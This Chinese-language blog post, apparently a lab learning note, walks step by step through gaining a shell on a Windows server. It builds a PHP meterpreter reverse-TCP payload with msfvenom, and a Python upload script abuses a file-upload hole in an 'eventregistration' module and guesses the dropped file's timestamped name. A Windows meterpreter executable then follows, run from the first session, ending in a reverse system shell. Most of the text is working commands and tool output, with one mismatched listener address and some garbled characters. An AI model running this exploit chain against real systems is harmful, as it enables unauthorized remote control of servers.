meterpreter php payload && windows payload 学习
2024-10-22 08:43:31
一 情景
本地kali linux 192.168.1.2
目标 windows NT 服务器192.168.1.4
目的是获取shell
二 过程
首先在linux建立终端
,msfconsole
建立php的payload,shell.php
root@simpleedu:~# rz root@simpleedu:~# msfconsole msf > msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
[*] exec: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30092 bytes
通过脚本上传到服务器。这里python脚本在本地windows编写然后通过xshell rz 传到kali。 pxy同学提供
import requests
base_url='http://192.168.1.4/'
url_for_time='index.php?module=eventregistration&action=eventsCalendar'
url_for_upload='index.php?module=eventregistration&action=emailRegistrants&email_addresses=123456789@123.com&email_message=1&email_subject=1' files={'attach':open('shell.php','rb')} requests.post(base_url+url_for_upload,files=files) print 'upload finish' r=requests.get(base_url+url_for_time)
html1=r.content
#print html1
index=r.content.find('History.pushState')
if index:
time=html1[index:index+60].split('rel')[1].split('\'')[1]
else:
print 'something wrong'
exit(0)
print "get time:"+ time for i in range(int(time),int(time)-20,-1):
shell_url=base_url+'tmp/'+str(i)+'_shell.php'
r2=requests.get(shell_url)
if r2.status_code==200:
print "shell is here : "+shell_url
然后在msfconsole中use multi/handle 开启监听 use php/meterpreter/reverse-tcp, set LHOST set LPORT exploit
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.1.2:4444
访问页面
然后看本地的终端已经建立了session
sessions查看已有session,sessions -i 1使用第一个session
利用该php的session可以做一些基础的操作比如pwd。。
但是不能使用windows的shell,这也是为什么接下来要做windows的payload
msf exploit(handler) > [*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:49203) at 2020-02-27 01:02:27 -0500 msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1... meterpreter > ls
Listing: C:\phpStudy\WWW\tmp
============================ Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache
40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c
然后新建终端,msfconsole,新建windows payload,shell.exe。注意端口要和php的不重复
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
然后用刚刚php的session upload 到服务器,
meterpreter > ls
Listing: C:\phpStudy\WWW\tmp
============================ Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache
40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c meterpreter > upload shell.exe
[*] uploading : shell.exe -> shell.exe
[*] uploaded : shell.exe -> shell.exe
meterpreter > ls
Listing: C:\phpStudy\WWW\tmp
============================ Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou
40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache
100777/rwxrwxrwx 73802 fil 2020-02-26 17:02:33 -0500 shell.exe
40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c
此时在新建的终端use multi/handle 开启监听 use windows/meterpreter/reverse-tcp,set LHOST set LPORT exploit
root@simpleedu:~# msfconsole _ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v4.16.15-dev ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.1.2:443
然后用php的session执行刚刚的windows的payload execute -f shell.exe
meterpreter > execute shell.exe
[-] You must specify an executable file with -f
meterpreter > execute shell.exe -f
[-] You must specify an executable file with -f
meterpreter > execute -f shell.exe
Process 2640 created.
此时看新终端,检测到了session
然后类似于上面的php的操作步骤,可以使用这个session
同时可以使用 windows的 shell
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.4:49204) at 2020-02-27 01:05:06 -0500 msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1... meterpreter > shell
Process 640 created.
Channel 1 created.
Microsoft Windows [°汾 6.3.9600]
(c) 2013 Microsoft Corporation¡£±£´̹ԐȨ{¡£ C:\phpStudy\WWW\tmp>cd C:
cd C:
C:\phpStudy\WWW\tmp C:\phpStudy\WWW\tmp>cd^H^H^H
' ²»ˇŚ²¿»最新文章
- 2016年11月14日--SQL创建数据库、表-查、插、删、改
- FACADE
- GDC2014免费slide整理下载
- OpenMP并行编程
- [原创]java WEB学习笔记60:Struts2学习之路--Actioin-声明式异常处理
- shell 运算
- LCT小结
- Android基本控件之RadioGroup
- ServerProperties
- Linux shell-grep
- [array] leetcode - 41. First Missing Positive - Hard
- visio2010去除直线交叉处的歪曲
- 价值1.35亿美元的BUG
- linux命令:查看系统版本
- React-使用Redux-thunk中间件实现ajax数据请求
- MySQL 学习笔记 二
- [World Final 2016] Branch Assignment
- Java-----jar反编译修改重新打包
- HttpClient 教程 (四)
- Immutable 常用API简介
热门文章
- library cache pin解决方法
- python zxing包解析二维码报UnicodeDecodeError错误解决办法
- 2V转5V输出,2.4V转5V输出,DC-DC同步整流升压电路
- JVM重新认识(一)oop-klass模型--HSDB使用验证
- Python+Selenium+Unittest实现PO模式web自动化框架(1)
- 为什么MySQL索引使用B+树
- 提供个HDFS的目录的路径,对该目录进行创建和删除操作。创建目录时,如果目录 文件所在目录不存在则自动创建相应目录;删除目录时,由用户指定当该目录不为空时是否还删 除该目录
- smtplib.py
- poj 2112 最优挤奶方案
- (二)基于shard-jdbc中间件,实现数据分库分表